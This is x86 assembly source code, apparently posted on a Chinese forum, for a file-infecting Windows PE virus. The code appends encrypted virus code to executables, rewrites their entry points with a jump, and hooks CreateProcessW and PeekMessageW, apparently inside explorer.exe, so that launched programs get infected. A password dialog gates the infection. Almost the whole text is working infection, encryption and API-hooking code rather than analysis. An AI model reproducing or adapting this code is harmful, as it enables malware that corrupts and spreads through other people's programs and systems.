;节感染后的大小对齐到 SectionAlignment
PUSH .INH_OptionalHeader.IOH_SectionAlignment
PUSH EAX
CALL _Align2Number
MOV .ISH_VirtualSize,EAX
;改变节属性 = 读写可执行
MOV .ISH_Characteristics,IMAGE_SCN_MEM_ALL
;计算 ImageSize = 最后一节的虚拟地址 + 最后一节的大小对齐到SectionAlignment
ADD EAX,.ISH_VirtualAddress
MOV DWORD PTR ,EAX
;解除内存映射
PUSH DWORD PTR
CALL ddUnmapViewOfFile
;关闭内存映射文件句柄
PUSH DWORD PTR
CALL ddCloseHandle
;计算感染后文件大小
MOV EAX,DWORD PTR
ADD EAX,DWORD PTR
;用感染后的文件大小重新生成内存映射文件
PUSH NULL
PUSH EAX
PUSH 0
PUSH PAGE_READWRITE
PUSH NULL
PUSH DWORD PTR
CALL ddCreateFileMappingA
TEST EAX,EAX
JE _ErrorCloseFile
MOV DWORD PTR ,EAX
;映射到内存指针
PUSH 0
PUSH 0
PUSH 0
PUSH File_MAP_ALL_ACCESS
PUSH EAX
CALL ddMapViewOfFile_Host
TEST EAX,EAX
JE _ErrorCloseFile
MOV DWORD PTR ,EAX
;取得IMAGE_NT_HEADERS
MOV ESI,DWORD PTR
CALL _GetNtHeader
TEST EAX,EAX
JE _ErrorCloseViewOfMap
;修正SizeOfImage
PUSH DWORD PTR
POP .INH_OptionalHeader.IOH_SizeOfImage
;计算程序入口地址在文件中的偏移
PUSH .INH_OptionalHeader.IOH_AddressOfEntryPoint
PUSH EAX
CALL _GetRawFromRVA
MOV DWORD PTR ,EAX
;将修正后的节复制到最后一节
PUSH SIZE IMAGE_SECTION_HEADER
POP ECX
MOV EDI,DWORD PTR
MOVZX EAX,.INH_FileHeader.IFH_NumberOfSections
DEC EAX
MUL ECX
PUSH ESI
ADD ESI,SIZE IMAGE_NT_HEADERS
ADD ESI,EAX
XCHG EDI,ESI
REP MOVSB
POP ESI
;计算病毒入口地址相对于原程序入口的偏移
MOV EAX,DWORD PTR
SUB EAX,.INH_OptionalHeader.IOH_AddressOfEntryPoint
SUB EAX,5
LEA EDI,@d
INC EDI
STOSD
;保存原程序入口的代码
MOV ESI,DWORD PTR
ADD ESI,DWORD PTR
LEA EDI,@f
PUSH SIZE_OF_EPC
POP ECX
PUSH ECX
PUSH ESI
REP MOVSB
POP ESI
POP ECX
;将新代码写入原程序入口
LEA EDI,@a
XCHG EDI,ESI
REP MOVSB
;将病毒代码写入文件
PUSH 65535
PUSH 313
PUSH 421
CALL _RandNumber
MOV dbDecodeKey,AL
MOV selfFlag,AH
LEA ESI,_CodeHead
MOV EDI,DWORD PTR
ADD EDI,DWORD PTR
PUSH SIZE_OF_CODE
POP ECX
PUSH EDI
REP MOVSB
POP EDI
PUSH EDI
ADD EDI,NEW_START_OFF
PUSH SIZE_OF_ENCODE
POP ECX
_SecondEncode:
XOR BYTE PTR ,AL
INC EDI
LOOP _SecondEncode
POP EDI
ADD EDI,SELF_KEY_OFF
PUSH SIZE_OF_STR
POP ECX
_StringEncode:
XOR BYTE PTR ,AH
INC EDI
LOOP _StringEncode
_ErrorCloseViewOfMap:
PUSH DWORD PTR
CALL ddUnmapViewOfFile
_ErrorCloseFileMap:
PUSH DWORD PTR
CALL ddCloseHandle
_ErrorCloseFile:
PUSH DWORD PTR
CALL ddCloseHandle
_ErrorSetAttributs:
PUSH DWORD PTR
PUSH DWORD PTR
CALL ddSetFileAttributesA
_InfectExit:
MOV ESP,EBP
POP EBP
RET 4
_InfectExeFile ENDP
;***********************************************************************
_EntryPointCode:
@a: CALL $+5
@b: POP EAX
@c: PUSH EAX
@d: ADD EAX,0FFFFH
@e: JMP EAX
Align 4
@f: DB SIZE_OF_EPC DUP(0)
;***********************************************************************
;///////////////////////////////////////////////////////////////////////
;以下为内存对话框所需数据
;///////////////////////////////////////////////////////////////////////
check_okDB '密码正确,允许运行!',0
check_falseDB '密码错误,是否继续执行?继续的话将感染文件!',0
password DB '123456abcdef',0
buffer DB 20 DUP (0)
ALIGN 4
_TemplateBegin:
MemoryDialog DLGTEMPLATE<090c00080H,0,3,0,0,160,96>
DW 0
DW 0
_TemplateEnd:
dialogCaption DB '请输入执行密码',0
bt_OK DLGITEMTEMPLATE<050000001H,0,30,60,35,20,IDC_BUTTON_OK>
DW 0FFFFH
DW 00080H
OkCaption DB '确认',0
bt_Cancle DLGITEMTEMPLATE<050000001H,0,95,60,35,20,IDC_BUTTON_CANCEL>
DW 0FFFFH
DW 00080H
CancelCaption DB '取消',0
edit DLGITEMTEMPLATE<0500100A0H,000204H,30,20,100,12,IDC_EDIT_PASSWORD>
DW 0FFFFH
DW 00081H
editCaption DD 0
ALIGN 4
;///////////////////////////////////////////////////////////////////////
;以下为生成内存对话框代码
;///////////////////////////////////////////////////////////////////////
DialogWithoutRes PROC
PUSH EBX
PUSH ECX
PUSH EDI
CALL _DWR_Delta
_DWR_Delta:
POP EBX
SUB EBX,OFFSET _DWR_Delta
LEA EDI,DialogTemplate
PUSH 512
POP ECX
XOR EAX,EAX
REP STOSB
PUSH 1
PUSH OFFSET DialogTemplate
ADD DWORD PTR ,EBX
PUSH OFFSET MemoryDialog
ADD DWORD PTR ,EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return
PUSH 0
PUSH EAX
PUSH OFFSET bt_OK
ADD DWORD PTR ,EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return
PUSH 0
PUSH EAX
PUSH OFFSET bt_Cancle
ADD DWORD PTR ,EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return
PUSH 0
PUSH EAX
PUSH OFFSET edit
ADD DWORD PTR ,EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return
PUSH 0
PUSH OFFSET DlgProc
ADD DWORD PTR ,EBX
PUSH NULL
PUSH OFFSET DialogTemplate
ADD DWORD PTR ,EBX
PUSH NULL
CALL ddDialogBoxIndirectParamA
_DWR_Return:
POP EDI
POP ECX
POP EBX
RET
DialogWithoutRes ENDP
;**************************************************************************************
;InitializeTemplate stdcall,srcTemplate:DWORD,dstTemplate:DWORD,flagDialogOrItem:DWORD
;PUSH flagDialogOrItem
;PUSH dstTemplate
;PUSH srcTemplate
;PUSH return_address
;CALL InitializeTemplate
;PUSH EBP
;**************************************************************************************
InitializeTemplate PROC
PUSH EBP
MOV EBP,ESP
PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI
CALL _IT_Delta
_IT_Delta:
POP EBX
SUB EBX,OFFSET _IT_Delta
MOV ESI,DWORD PTR
MOV EDI,DWORD PTR
MOV ECX,SIZE_OF_TEMPLATE
CLD
REP MOVSB
PUSH 032H
PUSH EDI
PUSH -1
PUSH ESI
PUSH 0
PUSH 0
CALL ddMultiByteToWideChar
TEST EAX,EAX
JE _IT_return
PUSH EAX
XOR ECX,ECX
INC ECX
INC ECX
DIV CL
SHR EAX,8
XCHG EAX,ECX
XOR ECX,DWORD PTR
POP EAX
ADD EAX,ECX
SHL EAX,1
ADD EAX,EDI
ADD EAX,3
SHR EAX,2
SHL EAX,2
_IT_return:
POP EDI
POP ESI
POP ECX
POP EBX
MOV ESP,EBP
POP EBP
RET 12
InitializeTemplate ENDP
;CenterDialog PROC stdcall,HWND:DWORD
;PUSH HWND
;PUSH return_address
;CALL CenterDialog
;PUSH EBP
;RECT of desktop window left,top,right,bottom
;RECT of this window
CenterDialog PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,32
PUSH EBX
CALL _CD_Delta
_CD_Delta:
POP EBX
SUB EBX,OFFSET _CD_Delta
PUSH EBP
SUB DWORD PTR ,32
PUSH DWORD PTR
CALL ddGetWindowRect
CALL ddGetDesktopWindow
PUSH EBP
SUB DWORD PTR ,16
PUSH EAX
CALL ddGetWindowRect
PUSH 1
PUSH DWORD PTR
PUSH DWORD PTR
MOV EAX,DWORD PTR
SUB EAX,DWORD PTR
SHR EAX,1
PUSH EAX
MOV EAX,DWORD PTR
SUB EAX,DWORD PTR
SHR EAX,1
PUSH EAX
PUSH DWORD PTR
CALL ddMoveWindow
POP EBX
ADD ESP,36
MOV ESP,EBP
POP EBP
RET
CenterDialog ENDP
;DlgProc STDCALL,hwnd_:DWORD,wmsg:DWORD,wparam_:DWORD,lparam_:DWORD
;PUSH lparam_
;PUSH wparam_
;PUSH msg_
;PUSH hwnd_
;PUSH return_address
;CALL dlgProc
;PUSH EBP
DlgProc PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,4
PUSH 0
POP DWORD PTR
PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI
CALL _DP_Delta
_DP_Delta:
POP EBX
SUB EBX,OFFSET _DP_Delta
CMP DWORD PTR , WM_DESTROY
JE msg_DESTORY
CMP DWORD PTR , WM_CLOSE
JE msg_DESTORY
CMP DWORD PTR , WM_COMMAND
JE msg_COMMAND
CMP DWORD PTR , WM_INITDIALOG
JE msg_INITDIALOG
XOR EAX,EAX
JMP _DP_Return
msg_INITDIALOG:
PUSH DWORD PTR
CALL CenterDialog
JMP _DP_Return
msg_DESTORY:
PUSH DWORD PTR
PUSH DWORD PTR
CALL ddEndDialog
JMP _DP_Return
msg_COMMAND:
CMP WORD PTR ,IDC_BUTTON_OK
JE Check_PWD
CMP WORD PTR , IDC_BUTTON_CANCEL
JE msg_DESTORY
JMP _DP_Return
Check_PWD:
PUSH 19
PUSH OFFSET buffer
ADD DWORD PTR ,EBX
PUSH IDC_EDIT_PASSWORD
PUSH DWORD PTR
CALL ddGetDlgItemTextA
CMP EAX,12
JNE Input_Error
PUSH EAX
POP ECX
MOV ESI,OFFSET buffer
ADD ESI,EBX
MOV EDI,OFFSET password
ADD EDI,EBX
CLD
REPE CMPSB
JCXZ Input_OK
JMP Input_Error
Input_OK:
PUSH MB_OK
PUSH NULL
PUSH OFFSET check_ok
ADD DWORD PTR ,EBX
PUSH DWORD PTR
CALL ddMessageBoxA
PUSH 1
POP DWORD PTR
JMP msg_Destory
Input_Error:
PUSH MB_YESNO
PUSH NULL
PUSH OFFSET check_false
ADD DWORD PTR ,EBX
PUSH DWORD PTR
CALL ddMessageBoxA
CMP EAX,6
JNE _DP_Return
PUSH 2
POP DWORD PTR
JMP msg_Destory
_DP_Return:
POP EDI
POP ESI
POP ECX
POP EBX
ADD ESP,4
MOV ESP,EBP
POP EBP
RET 16
DlgProc ENDP
_CreateProcessW_Hook PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,01000H
PUSH EBX
PUSH ECX
PUSH EDX
PUSH ESI
PUSH EDI
CALL _CPWDelta
_CPWDelta:
POP EBX
SUB EBX,OFFSET _CPWDelta
MOV EAX,DWORD PTR
TEST EAX,EAX
JNZ _GetParamI
_GetParamII:
MOV EAX,DWORD PTR
TEST EAX,EAX
JZ _CPWExit
_GetParamI:
MOV ESI,EAX
MOV EDI,EBP
SUB EDI,MAX_PATH
;将Unicode字符转化为 ASCII 字符
PUSH NULL
PUSH NULL
PUSH MAX_PATH
PUSH EDI
PUSH -1
PUSH ESI
PUSH 0
PUSH 0
CALL ddWideCharToMultiByte
TEST EAX,EAX
JE _CPWExit
PUSH EDI
SUB EDI,MAX_PATH
PUSH EDI
CALL _GetExeFileName
CALL DialogWithOutRes
XCHG EAX,ECX
JCXZ _CPWExit
DEC ECX
JCXZ _ProcessNormal
PUSH EDI
CALL _InfectExeFile
_ProcessNormal:
CALL _CPW_OldCodeStore
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
CALL ddCreateProcessW
_CPWExit:
CALL _CPW_NewCodeStore
POP EDI
POP ESI
POP EDX
POP ECX
POP EBX
MOV ESP,EBP
POP EBP
RET 40
_CreateProcessW_Hook ENDP
;***********************************************************************
_PeekMessageW_Hook:
PUSH EBP
MOV EBP,ESP
SUB ESP,4
PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI
CALL _PeekMessageWDelta
_PeekMessageWDelta:
POP EBX
SUB EBX,OFFSET _PeekMessageWDelta
;查看内存映射文件是否已经打开
;若已打开则直接跳出
PUSH ddMapFileHandle_Host
POP EAX
TEST EAX,EAX
JNE _IsNotFirstIn
;打开内存映射文件
_PushAddress szMapFileName_Host
PUSH 0
PUSH FILE_MAP_WRITE
CALL ddOpenFileMappingA_Host
;打开失败则退出
TEST EAX,EAX
JE _IsNotFirstIn
MOV ddMapFileHandle_Host,EAX
;映射地址空间
PUSH 0
PUSH 0
PUSH 0
PUSH FILE_MAP_ALL_ACCESS
PUSH EAX
CALL ddMapViewOfFile_Host
TEST EAX,EAX
JE _IsNotFirstIn
MOV ddViewOfMap_Host,EAX
MOV EDI,EAX
;将CreateProcessW的挂接函数地址写入挂接代码
;写入内存映射文件中
ADD EAX,CPW_HOOK_OFF
ADD EDI,CPW_CODE_OFF
INC EDI
STOSD
;写入PeekMessage Hook中
LEA EDI,CPW_NewCode
INC EDI
STOSD
;更改CreateProcessW所在页面的保护属性
MOV EAX,ddCreateProcessW_Host
AND EAX,0FFFFF000H
PUSH EBP
SUB DWORD PTR ,4
PUSH PAGE_EXECUTE_READWRITE
PUSH 02000H
PUSH EAX
CALL ddVirtualProtect_Host
TEST EAX,EAX
JE _IsNotFirstIn
;打开 event 对象
_PushAddress szEventName
PUSH 0
PUSH EVENT_MODIFY_STATE
CALL ddOpenEventA_Host
TEST EAX,EAX
JE _IsNotFirstIn
PUSH EAX
;将挂接代码写入CreateProcessW
CALL _CPW_NewCodeStore
;将Event对象设置为有信号
CALL ddSetEvent_Host
_IsNotFirstIn:
MOV EAX,EBX
POP EDI
POP ESI
POP ECX
POP EBX
MOV ESP,EBP
POP EBP
PUSH DWORD PTR ddPeekMessageW_Host
POP EAX
JMP EAX
_CPW_NewCodeStore PROC
PUSH 7
POP ECX
MOV EDI,ddCreateProcessW_Host
LEA ESI,CPW_NewCode
REP MOVSB
RET
_CPW_NewCodeStore ENDP
szMapFileName_Host DB "LongliveChairmanMao",0
szEventName DB "TheThoughtOfChiremanMaoAlwaysShines",0
ALIGN 4
ddMapFileHandle_Host DD 0
ddViewOfMap_Host DD 0
ddMapViewOfFile_Host DD 0
ddCreateProcessW_Host DD 0
ddOpenFileMappingA_Host DD 0
ddVirtualProtect_Host DD 0
ddOpenEventA_Host DD 0
ddSetEvent_Host DD 0
ddMessageBoxA_Host DD 0
ddPeekMessageW_Host DD 0
CPW_OldCode DB 8 DUP(0)
CPW_NewCode DB 0B8H,0,0,0,0,0FFH,0E0H,0
_PeekMessageW_HookTail:
szTestFile DB "E:\Notepad.exe",0
szLoadLibraryA DB "LoadLibraryA",0
szCreateToolhelp32Snapshot DB "CreateToolhelp32Snapshot",0
szProcess32First DB "Process32First",0
szProcess32Next DB "Process32Next",0
szModule32First DB "Module32First",0
szModule32Next DB "Module32Next",0
szOpenProcess DB "OpenProcess",0
szUnmapViewOfFile DB "UnmapViewOfFile",0
szCloseHandle DB "CloseHandle",0
szGetFileAttributesA DB "GetFileAttributesA",0
szSetFileAttributesA DB "SetFileAttributesA",0
szCreateFileA DB "CreateFileA",0
szGetFileSize DB "GetFileSize",0
szGetTickCount DB "GetTickCount",0
szWriteProcessMemory DB "WriteProcessMemory",0
szReadProcessMemory DB "ReadProcessMemory",0
szVirtualProtectEx DB "VirtualProtectEx",0
szWideCharToMultiByte DB "WideCharToMultiByte",0
szMultiByteToWideChar DB "MultiByteToWideChar",0
szCreateEventA DB "CreateEventA",0
szWaitForSigleObject DB "WaitForSingleObject",0
szCreateProcessW DB "CreateProcessW",0
szOpenFileMappingA DB "OpenFileMappingA",0
szVirtualProtect DB "VirtualProtect",0
szOpenEventA DB "OpenEventA",0
szSetEvent DB "SetEvent",0,0
szUser32 DB "USER32.DLL",0
szMessageBoxA DB "MessageBoxA",0
szPeekMessageW DB "PeekMessageW",0
szGetDesktopWindow DB "GetDesktopWindow",0
szDialogBoxIndirectParamA DB "DialogBoxIndirectParamA",0
szGetDlgItemTextA DB "GetDlgItemTextA",0
szGetWindowRect DB "GetWindowRect",0
szMoveWindow DB "MoveWindow",0
szEndDialog DB "EndDialog",0,0
szExplorer DB "EXPLORER.EXE",0
ALIGN 4
_CodeTail:
ddExplorerHandle DD ?
ddExplorerModule DD ?
ddCreateFileMappingA DD ?
ddGetProcAddress DD ?
ddLoadLibraryA DD ?
ddCreateToolhelp32Snapshot DD ?
ddProcess32First DD ?
ddProcess32Next DD ?
ddModule32First DD ?
ddModule32Next DD ?
ddOpenProcess DD ?
ddUnmapViewOfFile DD ?
ddCloseHandle DD ?
ddGetFileAttributesA DD ?
ddSetFileAttributesA DD ?
ddCreateFileA DD ?
ddGetFileSize DD ?
ddGetTickCount DD ?
ddWriteProcessMemory DD ?
ddReadProcessMemory DD ?
ddVirtualProtectEx DD ?
ddWideCharToMultiByte DD ?
ddMultiByteToWideChar DD ?
ddCreateEventA DD ?
ddWaitForSingleObject DD ?
ddCreateProcessW DD ?
ddOpenFileMappingA DD ?
ddVirtualProtect DD ?
ddOpenEventA DD ?
ddSetEvent DD ?
ddMessageBoxA DD ?
ddPeekMessageW DD ?
ddGetDesktopWindow DD ?
ddDialogBoxIndirectParamA DD ?
ddGetDlgItemTextA DD ?
ddGetWindowRect DD ?
ddMoveWindow DD ?
ddEndDialog DD ?
ALIGN 4
ddGlobalBuffer DD ?
ALIGN 4
DialogTemplate DD ?
END _Main
CONTEXT STRUC
C_ContextFlags DD ?
C_Dr0 DD ?
C_Dr1 DD ?
C_Dr2 DD ?
C_Dr3 DD ?
C_Dr6 DD ?
C_Dr7 DD ?
C_Float DB 70H DUP(?)
C_SegGs DD ?
C_SegFs DD ?
C_SegEs DD ?
C_SegDs DD ?
C_Edi DD ?
C_Esi DD ?
C_Ebx DD ?
C_Edx DD ?
C_Ecx DD ?
C_Eax DD ?
C_Ebp DD ?
C_Eip DD ?
C_SegCs DD ?
C_EFlags DD ?
C_Esp DD ?
C_SegSs DD ?
CONTEXT ENDS
EXCEPTION_POINTERS STRUC
ExceptionRecord DD ?
ContextRecord DD ?
EXCEPTION_POINTERS ENDS
EXCEPTION_RECORD STRUC
ExceptionCode DD ?
ExceptionFlags DD ?
LPExceptionRecord DD ?
ExceptionAddress DD ?
NumberParameters DD ?
ExceptionInformation DD 0FH DUP(?)
EXCEPTION_RECORD ENDS
IMAGE_DOS_HEADER STRUC
IDH_magic DW ?
IDH_cblp DW ?
IDH_cp DW ?
IDH_crlc DW ?
IDH_cparhdr DW ?
IDH_minalloc DW ?
IDH_maxalloc DW ?
IDH_ss DW ?
IDH_sp DW ?
IDH_csum DW ?
IDH_ip DW ?
IDH_cs DW ?
IDH_lfarlc DW ?
IDH_ovno DW ?
IDH_res DW 4 DUP(?)
IDH_oemid DW ?
IDH_oeminfo DW ?
IDH_res2 DW 10 DUP(?)
IDH_lfanew DD ?
IMAGE_DOS_HEADER ENDS
DOS_SIGN = 05A4DH
IMAGE_DATA_DIRECTORY STRUC
IDD_VirtualAddress DD ?
IDD_Size DD ?
IMAGE_DATA_DIRECTORY ENDS
IMAGE_FILE_HEADER STRUC
IFH_Machine DW ?
IFH_NumberOfSections DW ?
IFH_TimeDateStamp DD ?
IFH_PointerToSymbolTable DD ?
IFH_NumberOfSymbols DD ?
IFH_SizeOfOptionalHeader DW ?
IFH_Characteristics DW ?
IMAGE_FILE_HEADER ENDS
IMAGE_OPTIONAL_HEADER STRUC
IOH_Magic DW ?
IOH_MajorLinkerVersion DB ?
IOH_MinorLinkerVersion DB ?
IOH_SizeOfCode DD ?
IOH_SizeOfInitializedData DD ?
IOH_SizeOfUninitializedData DD ?
IOH_AddressOfEntryPoint DD ?
IOH_BaseOfCode DD ?
IOH_BaseOfData DD ?
IOH_ImageBase DD ?
IOH_SectionAlignment DD ?
IOH_FileAlignment DD ?
IOH_MajorOperatingSystemVersion DW ?
IOH_MinorOperatingSystemVersion DW ?
IOH_MajorImageVersion DW ?
IOH_MinorImageVersion DW ?
IOH_MajorSubsystemVersion DW ?
IOH_MinorSubsystemVersion DW ?
IOH_Win32VersionValue DD ?
IOH_SizeOfImage DD ?
IOH_SizeOfHeaders DD ?
IOH_CheckSum DD ?
IOH_Subsystem DW ?
IOH_DllCharacteristics DW ?
IOH_SizeOfStackReserve DD ?
IOH_SizeOfStackCommit DD ?
IOH_SizeOfHeapReserve DD ?
IOH_SizeOfHeapCommit DD ?
IOH_LoaderFlags DD ?
IOH_NumberOfRvaAndSizes DD ?
IOH_DataDirectory IMAGE_DATA_DIRECTORY 10H DUP(?)
IMAGE_OPTIONAL_HEADER ENDS
IMAGE_NT_HEADERS STRUC
INH_Signature DD ?
INH_FileHeader IMAGE_FILE_HEADER ?
INH_OptionalHeader IMAGE_OPTIONAL_HEADER ?
IMAGE_NT_HEADERS ENDS
NT_SIGN = 04550H
IMAGE_SECTION_HEADER STRUC
ISH_Name DB 8 DUP (?)
ISH_VirtualSize DD ?
ISH_VirtualAddress DD ?
ISH_SizeOfRawData DD ?
ISH_PointerToRawData DD ?
ISH_PointerToRelocations DD ?
ISH_PointerToLinenumbers DD ?
ISH_NumberOfRelocations DW ?
ISH_NumberOfLinenumbers DW ?
ISH_Characteristics DD ?
IMAGE_SECTION_HEADER ENDS
IMAGE_IMPORT_DESCRIPTOR STRUC
IID_Characteristics DD ?
IID_TimeDateStamp DD ?
IID_ForwarderChain DD ?
IID_Name DD ?
IID_FirstThunk DD ?
IMAGE_IMPORT_DESCRIPTOR ENDS
IMAGE_THUNK_DATA32 STRUC
ITD_Function DD ?
IMAGE_THUNK_DATA32 ENDS
IMAGE_EXPORT_DIRECTORY STRUC
IED_Characteristics DD ?
IED_TimeDateStamp DD ?
IED_MajorVersion DW ?
IED_MinorVersion DW ?
IED_Name DD ?
IED_Base DD ?
IED_NumberOfFunctions DD ?
IED_NumberOfNames DD ?
IED_AddressOfFunctions DD ?
IED_AddressOfNames DD ?
IED_AddressOfNameOrdinals DD ?
IMAGE_EXPORT_DIRECTORY ENDS
FILE_TIME STRUC
FT_LowDateTime DD ?
FT_HighDateTime DD ?
FILE_TIME ENDS
MAX_MODULE_NAME32 = 256
MAX_PATH = 260
WIN32_FIND_DATA STRUC
WFD_FileAttributes DD ?
WFD_CreationTime FILE_TIME ?
WFD_LastAccessTime FILE_TIME ?
WFD_LastWriteTime FILE_TIME ?
WFD_FileSizeHigh DD ?
WFD_FileSizeLow DD ?
WFD_Reserved0 DD ?
WFD_Reserved1 DD ?
WFD_FileName DB MAX_PATH DUP(?)
WFD_AlternateFileName DB 14 DUP(?)
WIN32_FIND_DATA ENDS
PROCESS_ENTRY32 STRUC
PE_dwSize DD ?
PE_cntUsage DD ?
PE_th32ProcessID DD ?
PE_th32DefaultHeapID DD ?
PE_th32ModuleID DD ?
PE_cntThreads DD ?
PE_th32ParentProcessID DD ?
PE_pcPriClassBase DD ?
PE_dwFlags DD ?
PE_szExeFile DB MAX_PATH DUP(?)
PROCESS_ENTRY32 ENDS
MODULE_ENTRY32 STRUC
ME_dwSize DD ?
ME_th32ModuleID DD ?
ME_th32ProcessID DD ?
ME_GlblcntUsage DD ?
ME_ProccntUsage DD ?
ME_modBaseAddr DD ?
ME_modBaseSize DD ?
ME_hModule DD ?
ME_szModule DB MAX_MODULE_NAME32 DUP(?)
ME_szExePath DB MAX_PATH DUP(?)
MODULE_ENTRY32 ENDS
OS_VERSION_INFO STRUC
OVI_dwOSVersionInfoSize DD ?
OVI_dwMajorVersion DD ?
OVI_dwMinorVersion DD ?
OVI_dwBuildNumber DD ?
OVI_dwPlatformId DD ?
OVI_szCSDVersion DB 128 DUP(?)
OS_VERSION_INFO ENDS
DLGTEMPLATE STRUC
DT_style DD ?
DT_ExtendedStyle DD ?
DT_cdit DW ?
DT_x DW ?
DT_y DW ?
DT_cx DW ?
DT_cy DW ?
DLGTEMPLATE ENDS
DLGITEMTEMPLATE STRUC
DIT_style DD ?
DIT_ExtendedStyle DD ?
DIT_x DW ?
DIT_y DW ?
DIT_cx DW ?
DIT_cy DW ?
DIT_id DW ?
DLGITEMTEMPLATE ENDS
FILE_ATTRIBUTE_ARCHIVE = 20H
FILE_ATTRIBUTE_NORMAL = 80H
FILE_ATTRIBUTE_DIRECTORY = 10H
GENERIC_READ = 80000000H
GENERIC_WRITE = 40000000H
GENERIC_EXECUTE = 20000000H
GENERIC_ALL = 10000000H
CREATE_NEW = 1
CREATE_ALWAYS = 2
OPEN_EXISTING = 3
OPEN_ALWAYS = 4
INVALID_HANDLE_VALUE = 0FFFFFFFFH
NULL = 0
PAGE_SIZE = 1000H
PAGE_NOACCESS = 1
PAGE_READONLY = 2
PAGE_READWRITE = 4
PAGE_WRITECOPY = 8
PAGE_EXECUTE = 16
PAGE_EXECUTE_READWRITE = 40H
MEM_COMMIT = 1000H
MEM_RESERVE = 2000H
MEM_DECOMMIT = 4000H
MEM_RELEASE = 8000H
FILE_MAP_COPY = 1
FILE_MAP_WRITE = 2
FILE_MAP_READ = 4
FILE_MAP_ALL_ACCESS = 0F001FH
IMAGE_SCN_CNT_CODE = 20H
IMAGE_SCN_CNT_INITIALIZED_DATA = 40H
IMAGE_SCN_MEM_SHARED = 10000000H
IMAGE_SCN_MEM_EXECUTE = 20000000H
IMAGE_SCN_MEM_READ = 40000000H
IMAGE_SCN_MEM_WRITE = 80000000H
IMAGE_SCN_MEM_ALL = 0C0000060H
TH32CS_SNAPHEAPLIST = 1
TH32CS_SNAPPROCESS = 2
TH32CS_SNAPTHREAD = 4
TH32CS_SNAPMODULE = 8
TH32CS_SNAPALL = 0FH
TH32CS_INHERIT = 80000000H
VER_PLATFORM_WIN32s = 0
VER_PLATFORM_WIN32_WINDOWS = 1
VER_PLATFORM_WIN32_NT = 2
PROCESS_VM_OPERATION = 8H
PROCESS_VM_READ = 10H
PROCESS_VM_WRITE = 20H
PROCESS_DUP_HANDLE = 40H
PROCESS_CREATE_PROCESS = 80H
PROCESS_SET_QUOTA = 100H
PROCESS_SET_INFORMATION = 200H
PROCESS_QUERY_INFORMATION = 400H
PROCESS_OPEN_ACCESS = PROCESS_VM_OPERATION OR PROCESS_VM_READ OR PROCESS_VM_WRITE
ERROR_ALREADY_EXISTS = 183
CREATE_SUSPENDED = 4
MB_OK = 0
MB_OKCANCEL = 1
MB_ABORTRETRYIGNORE = 2
MB_YESNOCANCEL = 3
MB_YESNO = 4
MB_RETRYCANCEL = 5
IDOK = 1
IDCANCEL = 2
IDABORT = 3
IDRETRY = 4
IDIGNORE = 5
IDYES = 6
IDNO = 7
EXCEPTION_EXECUTE_HANDLER = 1
EXCEPTION_CONTINUE_SEARCH = 0
EXCEPTION_CONTINUE_EXECUTION = -1
WAIT_TIMEOUT = 0102H
WAIT_FAILED = 0FFFFFFFFH
WAIT_OBJECT_0 = 0
EVENT_MODIFY_STATE = 2
{:10_262:}{:10_262:}{:10_262:}
页:
[1]